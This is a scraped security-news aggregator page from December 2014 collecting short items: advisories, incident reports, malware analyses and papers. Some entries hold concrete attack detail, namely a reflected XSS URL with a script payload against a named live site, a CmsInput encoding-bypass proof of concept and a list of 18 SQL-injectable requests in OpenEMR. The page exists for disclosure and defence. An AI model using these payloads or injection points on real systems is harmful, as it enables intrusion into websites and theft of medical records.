Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

Security advisory – High severity – InfiniteWP Client WordPress plugin

December 2, 2014, 2:45 pm
$
0
0
If you’re using the InfiniteWP WordPress Client plugin to manage your website, now is a good time to update. While doing a routine audit of our Website Firewall product, we discovered a vulnerability in the plugin that could be used by a malicious individual to 1) disable a users web site by putting it in maintenance mode and 2) allows the user to control the content of the maintenance page.

more here........http://blog.sucuri.net/2014/12/security-advisory-high-severity-infinitewp-client-wordpress-plugin.html
Search

XSS in WIX pages

December 3, 2014, 2:21 am
$
0
0
57 million web pages are affected by a security problem in wix.com

Proof of concept of a web page made in wix.com:
http://www.itsec.cl/

to see the source code can observe the following:

...
Find the SEO content of this site's homepage via http://www.itsec.cl/?_escaped_fragment_=
(That is where search engines like Google go to read your homepage's content.)
...

tried to access an existing section and added a third invalid parameter, after that launched the attack code:

Valid URL:
http://www.itsec.cl/?_escaped_fragment_=partners/c1ryi/

XSS URL:
http://www.itsec.cl/?_escaped_fragment_=partners/c1ryi/x"><script>alert('xss')</script>

How cheap is expensive.


/Devsec, Security Departament. Chile./

Yii framework CmsInput extension improper XSS sanitation

December 3, 2014, 2:22 am
$
0
0
[+] Yii framework CmsInput extension [1] improper XSS sanitation
[+] Discovered by: Jos Wetzels
[+] Affects: Yii framework CmsInput extension <= version 1.2

Yii framework's CmsInput extension versions 1.2 and prior suffer from
an improper XSS sanitation implementation, which has now been resolved
in cooperation with the author [2], introducing XSS vulnerabilities in
web applications developed by third-party framework users [3].
CmsInput is an extension of the Yii framework designed to wrap
HtmlPurifier and the Codeigniter Security class in a single component
for user-input sanitation. The problem resides in CmsInput's default
cleaning method stripClean in CmsInput.php:

    public function stripClean($str)
    {
        return $this->xssClean($this->stripTags($str));
    }

What happens is that stripTags is called on the user-supplied input
before xssClean is called. stripTags is designed to eliminate all HTML
and PHP tags from the user-supplied input by wrapping PHP's strip_tags
[4] function. xssClean is a wrapper for Codeigniter's xss_clean [5]
function, which aims to strip user-supplied input of all suspicious
XSS-related input. Within xssClean, the user-supplied input is
URL-decoded before further processing:

$str = rawurldecode($str);

The problem arises when stripClean is used to sanitize a URL-encoded
user-supplied string, which is then later used under the assumption it
was stripped of all possible XSS vectors. Since stripTags simply
eliminates all raw HTML
and PHP tags and a URL-encoded string contains none, the string gets
passed to xssClean in unchanged form, where it will be URL-decoded
into a string containing HTML tags, thus allowing injection of (a
limited subset of) HTML elements in uninteded locations.

Proof of Concept:

stripClean("%3Cimg%20src%20%3D%20%22http%3A%2F%2Ftest.com%2Fcsrf.php%22%3E")
= '<img src = "http://test.com/csrf.php">'

[*] Mitigation:
Upgrade to CmsInput version 1.3 [2]

[*] References:

1. http://www.yiiframework.com/extension/input/
2. http://www.yiiframework.com/extension/input/#hh7
3. Eg.: https://www.humhub.org/
4. http://php.net/manual/en/function.strip-tags.php
5. https://ellislab.com/codeigniter/user-guide/libraries/security.html

Incident Report - DDoS Attack

December 3, 2014, 2:27 am
$
0
0
This past Monday, we experienced a major volumetric DDoS attack which caused significant downtime for our site and the sites of our customers. The attack included sustained traffic of up to 25gb/s and about 50 million packets per second sent to our servers. I am very sorry that this outage happened and had such sustained and wide reaching effects. We have assembled here what we know about the attack, what we did to mitigate it, and the steps we are taking to mitigate similar attacks. The following post-mortem is a collaboration from the entire DNSimple team.

more here........http://blog.dnsimple.com/2014/12/incident-report-ddos/

XSS Payloads

December 3, 2014, 4:13 am
$
0
0
For several years I've been looking for different types of payloads I could use or adapt to my XSS exploits. I ended up with pieces of code spread everywhere, spending more time to search for what I needed than just rewriting it...

Obviously it was time to organize a little bit all this mess, and to share. I could build this library thanks to many people who help me learn, and code. Now it is my turn to share. Enjoy!

more here..........http://www.xss-payloads.com/

Sony hacking: were PlayStation servers used to spread stolen data?

December 3, 2014, 8:32 am
$
0
0
Following the release of confidential documents and four unreleased films, in the Sony hacking reported by We Live Security here, the bad news for the company continued as it was reported that the company’s own PlayStation servers were used to distribute the stolen data, The Independent reports.

more here......http://www.welivesecurity.com/2014/12/03/sony-hacking-playstation-servers-used-spread-stolen-data/

SektionEins releases Suhosin 0.9.37

December 3, 2014, 8:34 am
$
0
0
SektionEins is proud to announce the release of the PHP security extension Suhosin version 0.9.37.
more here.......https://www.sektioneins.de/en/blog/14-12-03-suhosin-release-0.9.37.html

PEN TESTING: CROSS SITE SCRIPTING (XSS)

December 4, 2014, 2:48 am
$
0
0
Cross Site Scripting (XSS) is the first test in a series of controls which exist to protect user data, prevent fraud and secure the organization’s web application and environment.

Cross Site Scripting (XSS) is a common application layer web attack that, despite originating from a website is actually executed on the users’ computer.

more here.........http://www.risk3sixty.com/2014/12/04/pen-testing-cross-site-scripting-xss/
Search

An Analysis of the “Destructive” Malware Behind FBI Warnings

December 4, 2014, 2:50 am
$
0
0
TrendLabs engineers were recently able to obtain a malware sample of the “destructive malware” described in reports about the Federal Bureau of Investigation (FBI) warning to U.S. businesses last December 2. According to Reuters, the FBI issued a warning to businesses to remain vigilant against this new “destructive” malware in the wake of the recent Sony Pictures attack. As of this writing, the link between the Sony breach and the  malware mentioned by the FBI has yet to be verified.

The FBI flash memo titled “#A-000044-mw” describes an overview of the malware behavior, which reportedly has the capability to override all data on hard drives of computers, including the master boot record, which prevents them from booting up.

Below is an analysis of our own findings here...........http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-the-destructive-malware-behind-fbi-warnings/

Paper: Apposcopy: Semantics-Based Detection of Android Malware through Static Analysis

December 4, 2014, 2:53 am
$
0
0
We present Apposcopy, a new semantics-based approach for
identifying a prevalent class of Android malware that steals
private user information. Apposcopy incorporates (i) a high-
level language for specifying signatures that describe seman-
tic characteristics of malware families and (ii) a static anal-
ysis for deciding if a given application matches a malware
signature. The signature matching algorithm of Apposcopy
uses a combination of static taint analysis and a new form of
program representation called Inter-Component Call Graph
to efficiently detect Android applications that have certain
control- and data-flow properties. We have evaluated Ap-
poscopy on a corpus of real-world Android applications and
show that it can effectively and reliably pinpoint malicious
applications that belong to certain malware families.

more here...........http://cs.stanford.edu/people/saswat/research/apposcopy.pdf

When cookies lead to a DoS in phpMyAdmin CVE-2014-9218

December 4, 2014, 4:34 am
$
0
0
"phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. phpMyAdmin supports a wide range of operations on MySQL, MariaDB and Drizzle. Frequently used operations (managing databases, tables, columns, relations, indexes, users, permissions, etc) can be performed via the user interface, while you still have the ability to directly execute any SQL statement."

Before starting with our findings, we would like to thank phpMyAdmin security team for their quick response and for their interest in keeping their software secure.

more here........http://www.behindthefirewalls.com/2014/12/when-cookies-lead-to-dos-in-phpmyadmin.html

CVE-2014-6332: Life is all Rainbows and Unicorns

December 4, 2014, 11:41 am
$
0
0
Though just patched earlier this month, the CVE-2014-6332 vulnerability shares it’s age with Yahoo, Neopets, and the hit TV show, Friends. This Windows vulnerability, also known as the “Unicorn” bug, has been exploited in the wild with help of a Visual Basic Script. It impacts almost every version of Microsoft Windows from Windows 95 onwards, and can be exploited in Internet Explorer versions 3 to 11, inclusive. This complex vulnerability gets its name from being extremely rare, somewhat like a unicorn. After all, it’s not every day you come across a unicorn galloping through your front yard.

more here.........http://labs.bromium.com/2014/12/04/cve-2014-6332-life-is-all-rainbows-and-unicorns/

Week to Weak: The Weaponization of Cyber Vulnerabilities

December 4, 2014, 11:43 am
$
0
0
Key findings of this report include:
• Following the announcement of a vulnerability, it
takes a little more than a week for an associated
exploit to be detected on the open web, leaving
system administrators a small window of time to
evaluate and apply patches - if available.
• Java, Adobe Flash, and Internet Explorer produced
the greatest number of vulnerability/detected
exploit pairs.
• Microsoft Office exploits fester the longest before
the underlying vulnerability is detected.
• Evidence of Apple products exploitation appears
the quickest following the announcement of a
vulnerability.
• The difference between open source and proprietary
software exploitation is insignificant, somewhat
contradicting the popular “Linus law” that states
that “given enough eyeballs, all bugs are shallow

more here..........http://info.recordedfuture.com/Portals/252628/resources/week-to-weak-report.pdf

Attack on Trust Threat Bulletin: Sony Breach Leaks Private Keys, Leaving Door Open

December 4, 2014, 11:44 am
$
0
0
On 24 November news of a major breach at Sony Pictures Entertainment was reported. An organization self-described as the Guardians of Peace (also known by #GOP) claimed responsibility. The group released compressed archives of over 217MB that the organization claims contains Sony data. Those able to access the data reported dozens of SSH private keys were included in the exfiltrated data.

more here........https://www.venafi.com/blog/post/attack-on-trust-threat-bulletin-sony-breach

SpoofedMe Social Login Attack

December 4, 2014, 11:45 am
$
0
0
IBM X-Force Finds Social Login Attack That Allows Intrusion to Many Websites’ Local Accounts

more here.......http://securityintelligence.com/spoofedme-social-login-attack-discovered-by-ibm-x-force-researchers/#.VIC5jTHF-So
Search

Guest timing attacks vs hash tables

December 4, 2014, 11:47 am
$
0
0
First, start with there are no good constant-time data structures. After reading the HN thread, I wanted to see if the attack was truly viable. Can we recovery a JSESSIONID? My previous efforts attacking Lua took a slightly different tack.


more here......http://www.tedunangst.com/flak/post/timing-attacks-vs-hash-tables

Credit Card Breach at Bebe Stores

December 5, 2014, 4:53 am
$
0
0
Data gathered from several financial institutions and at least one underground cybercrime shop suggest that thieves have stolen credit and debit card data from Bebe Stores Inc., a nationwide chain of some 200 women’s clothing stores.

more here........https://krebsonsecurity.com/2014/12/banks-credit-card-breach-at-bebe-stores/

Python Kerberos Exploitation Kit

December 5, 2014, 5:16 am
$
0
0
PyKEK (Python Kerberos Exploitation Kit), a python library to manipulate KRB5-related data. (Still in development)

For now, only a few functionalities have been implemented (in a quite Quick'n'Dirty way) to exploit MS14-068 (CVE-2014-6324) .

more here..........https://github.com/bidord/pykek

CVE-2014-5462 - Multiple Authenticated SQL Injections In OpenEMR

December 5, 2014, 5:18 am
$
0
0
Vulnerability title: Multiple Authenticated SQL Injections In OpenEMR
CVE: CVE-2014-5462
Vendor: OpenEMR
Product: OpenEMR
Affected version: 4.1.2(7) and earlier
Fixed version: N/A
Reported by: Jerzy Kramarz
Details:

SQL injection has been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database.

The following URLs and parameters have been confirmed to suffer from Multiple SQL injections:

Request 1

POST /openemr/interface/super/edit_layout.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=nq2h24dbqlcgee1rlrk3ufutq7
[...]
Content-Length: 134

formaction=&deletefieldid=&deletefieldgroup=&deletegroupname=&movegroupname=&movedirection=&selectedfields=&targetgroup=&layout_id=HIS<SQL Injection>


Request 2

POST /openemr/interface/reports/prescriptions_report.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0
[...]
Content-Length: 135

form_refresh=true&form_facility=&form_from_date=2014-01-01&form_to_date=2014-07-25&form_patient_id=1<SQL Injection>&form_drug_name=a<SQL Injection>&form_lot_number=1<SQL Injection>


Request 3

POST /openemr/interface/billing/edit_payment.php HTTP/1.1
Host: 192.168.56.102
[...]
Content-Length: 186
Cookie: pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; pma_theme=original; OpenEMR=3j8g58403l71iohk70l1oif3b5; pma_lang=en

CountIndexAbove=0&ActionStatus=&CountIndexBelow=0&after_value=&DeletePaymentDistributionId=&hidden_type_code=&ajax_mode=&payment_id=1<SQL Injection*gt;&ParentPage=&hidden_patient_code=&global_amount=&mode=


Request 4

GET /openemr/interface/forms_admin/forms_admin.php?id=17<SQL Injection>&method=enable HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0
Connection: keep-alive


Request 5

POST /openemr/interface/billing/sl_eob_search.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; pma_theme=original; OpenEMR=3j8g58403l71iohk70l1oif3b5; pma_lang=en

----------1034262177
Content-Disposition: form-data; name="form_pid"

5<SQL Injection>
----------1034262177
Content-Disposition: form-data; name="form_without"

on
----------1034262177
Content-Disposition: form-data; name="form_deposit_date"

5
----------1034262177
Content-Disposition: form-data; name="form_paydate"

5
----------1034262177
Content-Disposition: form-data; name="form_category"

All
----------1034262177
Content-Disposition: form-data; name="form_erafile"; filename="file.txt"
Content-Type: text/plain

boom
----------1034262177
Content-Disposition: form-data; name="MAX_FILE_SIZE"

5000000
----------1034262177
Content-Disposition: form-data; name="form_amount"

5
----------1034262177
Content-Disposition: form-data; name="form_encounter"

5<SQL Injection>
----------1034262177
Content-Disposition: form-data; name="form_to_date"

5
----------1034262177
Content-Disposition: form-data; name="form_payer_id"

2
----------1034262177
Content-Disposition: form-data; name="form_source"

5
----------1034262177
Content-Disposition: form-data; name="form_name"

BOOOM
----------1034262177
Content-Disposition: form-data; name="form_search"

Search
----------1034262177
Content-Disposition: form-data; name="form_date"

5-5-5
----------1034262177--



Request 6

GET /openemr/interface/logview/logview.php?end_date=2014-07-25&sortby=<SQL Injection>&csum=&event=&check_sum=on&start_date=2014-07-25&type_event=select&eventname=login HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; pma_theme=original; OpenEMR=3j8g58403l71iohk70l1oif3b5; pma_lang=en


Request 7

POST /openemr/interface/orders/procedure_stats.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0

form_sexes=1&form_to_date=2014-07-25&form_by=5&form_submit=Submit&form_show%5b%5d=.age&form_output=2&form_facility=4<SQL Injection>&form_from_date=0000-00-


Request 8

POST /openemr/interface/orders/pending_followup.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: pma_lang=en; pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0; pma_theme=original

form_to_date=2014-07-25&form_refresh=Refresh&form_facility=5<SQL Injection>&form_from_date=2014-07-25


Request 9

POST /openemr/interface/orders/pending_orders.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=3j8g58403l71iohk70l1oif3b5

form_to_date=2014-07-25&form_refresh=Refresh&form_facility=4<SQL Injection>&form_from_date=2014-07-25


Request 10

POST /openemr/interface/patient_file/deleter.php?patient=<SQL Injection>&encounterid=<SQL Injection>&formid=<SQL Injection>&issue=<SQL Injection>&document=&payment=&billing=&transaction= HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=kpqal2o1e4am9eh0lce5qt3ab0

form_submit=Yes%2c+Delete+and+Log


Request 11

POST /openemr/interface/patient_file/encounter/coding_popup.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: pma_lang=en; pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; OpenEMR=8oihner1200va2pr7oq1q67154

Search+Results=&newcodes=&bn_search=Search&ProviderID=1&search_type=CPT4&search_term=5<SQL Injection>


Request 12

POST /openemr/interface/patient_file/encounter/search_code.php?type= HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: pma_lang=en; pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; OpenEMR=8oihner1200va2pr7oq1q67154

text=5<SQL Injection<&submitbtn=Search&mode=search


Request 13

POST /openemr/interface/practice/ins_search.php HTTP/1.1
Host: 192.168.56.102
Accept: */*
Accept-Language: en
[...]
Cookie: OpenEMR=kpqal2o1e4am9eh0lce5qt3ab0

form_addr1=1<SQL Injection>&form_addr2=1<SQL Injection>&form_attn=5<SQL Injection>&form_country=U<SQL Injection>&form_freeb_type=2<SQL Injection>&form_phone=555-555-5555&form_partner=<SQL Injection>&form_name=P<SQL Injection>&form_zip=36<SQL Injection>&form_save=Save+as+New&form_state=W<SQL Injection>&form_city=W<SQL Injection>&form_cms_id=5<SQL Injection>


Request 14

POST /openemr/interface/patient_file/problem_encounter.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=p0locr2jieuagul105rkm95ob6

form_pelist=%2f&form_pid=0<SQL Injection>&form_save=Save&form_key=e


Request 15

POST /openemr/interface/reports/appointments_report.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=3j8g58403l71iohk70l1oif3b5

form_show_available=on&form_refresh=&form_to_date=2014-07-25&patient=<SQL Injection>&form_provider=1<SQL Injection>&form_apptstatus=<SQL Injection>&with_out_facility=on&form_facility=4<SQL Injection>&form_apptcat=9&form_from_date=2014-07-25&with_out_provider=on&form_orderby=date


Request 16

POST /openemr/interface/patient_file/summary/demographics_save.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=3m910jdpv3bfed8kie9jihecn6; pma_lang=en; pma_collation_connection=utf8_general_ci

form_i2subscriber_employer_country=USA&i3subscriber_DOB=0000-00-00&i3accept_assignment=FALSE&i3subscriber_city=Winterville&form_hipaa_mail=NO&form_allow_imm_info_share=NO&form_street=5&i3effective_date=0000-00-00&form_i1subscriber_state=AL&form_interpretter=5&i1subscriber_lname=boom&form_title=Mr.&i1subscriber_fname=boom&form_fname=Asd&form_i1subscriber_employer_state=AL&form_i1subscriber_relationship=self&form_i1subscriber_country=USA&form_i3subscriber_employer_state=AL&form_contact_relationship=5&form_mothersname=boom&i2group_number=5&form_em_state=AL&form_i3subscriber_country=USA&form_allow_patient_portal=NO&i2copay=5&i2policy_number=5&form_i2subscriber_sex=Female&i1accept_assignment=FALSE&i3subscriber_postal_code=SW1A+1AA&i2subscriber_ss=5&i1subscriber_mname=boom&form_pharmacy_id=0&i3subscriber_phone=5&form_phone_home=5&form_lname=Asd&mode=save&form_i2subscriber_country=USA&i2subscriber_employer=5&db_id=1&lt;SQL Injection&gt; &form_i1subscriber_employer_country=USA&form_d
 eceased_reason=5&form_i2subscriber_state=AL&form_city=Winterville&form_email=winter@example.com&i3subscriber_employer_street=5&form_genericval2=asd&i3group_number=5&form_em_street=5&form_genericval1=asd&form_language=armenian&i1provider=&i2provider=&form_em_city=Winterville&form_em_name=boom&i3subscriber_fname=boom&form_race=amer_ind_or_alaska_native&i1plan_name=boom&i3subscriber_employer_city=Winterville&form_pubpid=asd&form_mname=Asd&i2subscriber_employer_street=5&form_financial_review=0000-00-00+00%3a00%3a00&i3subscriber_mname=boom&i3provider=&i3subscriber_employer_postal_code=SW1A+1AA&form_country_code=USA&form_em_country=USA&i2subscriber_phone=5&i3policy_number=5&form_status=married&form_ss=asdasd&form_monthly_income=01&i1effective_date=0000-00-00&form_i2subscriber_relationship=self&i3plan_name=boom&i1subscriber_employer_street=5&i1subscriber_city=Winterville&form_allow_imm_reg_use=NO&form_drivers_license=asd&form_i3subscriber_employer_country=USA&form_em_postal_code=SW
 1A+1AA&form_hipaa_message=30&i1subscriber_employer_city=Winterville&i1subscriber_postal_code=SW1A+1AA&i3copay=5&i1copay=5&i3subscriber_street=5&i3policy_type=12&i1subscriber_street=5&form_vfc=eligible&form_i2subscriber_employer_state=AL&i2subscriber_street=5&form_guardiansname=boom&i1policy_number=5&i3subscriber_lname=boom&form_phone_contact=5&i2subscriber_employer_postal_code=SW1A+1AA&form_homeless=5&form_i1subscriber_sex=Female&form_i3subscriber_state=AL&form_referral_source=Patient&i2subscriber_fname=boom&i1subscriber_ss=5&form_providerID=1&form_state=AL&form_postal_code=SW1A+1AA&form_hipaa_allowsms=NO&i1subscriber_DOB=0000-00-00&i2subscriber_employer_city=Winterville&form_hipaa_allowemail=NO&form_DOB=1994-02-07&form_deceased_date=0000-00-00+00%3a00%3a00&i2effective_date=0000-00-00&i2subscriber_DOB=0000-00-00&i2subscriber_postal_code=SW1A+1AA&form_genericname2=asdasd&form_genericname1=asasd&i1group_number=5&i2subscriber_mname=boom&i2accept_assignment=FALSE&i1subscriber_em
 ployer=5&i3subscriber_ss=5&form_phone_cell=5&i2subscriber_lname=boom&form_ethnicity=hisp_or_latin&i1subscriber_phone=5&form_occupation=5&i3subscriber_employer=5&form_hipaa_voice=NO&form_allow_health_info_ex=NO&form_ref_providerID=1&i1policy_type=12&i1subscriber_employer_postal_code=SW1A+1AA&i2plan_name=boom&i2policy_type=12&form_hipaa_notice=NO&form_migrantseasonal=5&form_i3subscriber_relationship=self&form_i3subscriber_sex=Female&form_family_size=5&i2subscriber_city=Winterville&form_phone_biz=5&form_sex=Female


Request 17

GET /openemr/interface/fax/fax_dispatch_newpid.php?p=1<SQL Injection> HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=3m910jdpv3bfed8kie9jihecn6
Connection: keep-alive


Request 18

GET /openemr/interface/patient_file/reminder/patient_reminders.php?mode=simple&patient_id=1<SQL Injection> HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=ra3sfkvd85bjve6qjm9ouq3225


Further details at:

https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-5462/

Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

DeathRing: Pre-loaded malware hits smartphones for the second time in 2014

December 5, 2014, 10:12 am
$
0
0
When you walk out of a retailer with a shiny new phone, you trust that it’s clean and safe to use. But this might not always be the case, as evidenced by the latest pre-loaded malware Lookout identified called DeathRing. DeathRing is a Chinese Trojan that is pre-installed on a number of smartphones most popular in Asian and African countries. Detection volumes are moderate, though we consider this a concerning threat given its pre-loaded nature and the fact that we are actively seeing detections of it around the world.

Read more: DeathRing: Pre-loaded malware hits smartphones for the second time in 2014 (https://blog.lookout.com/?p=15835)
Viewing all 8064 articles
Browse latest View live
Search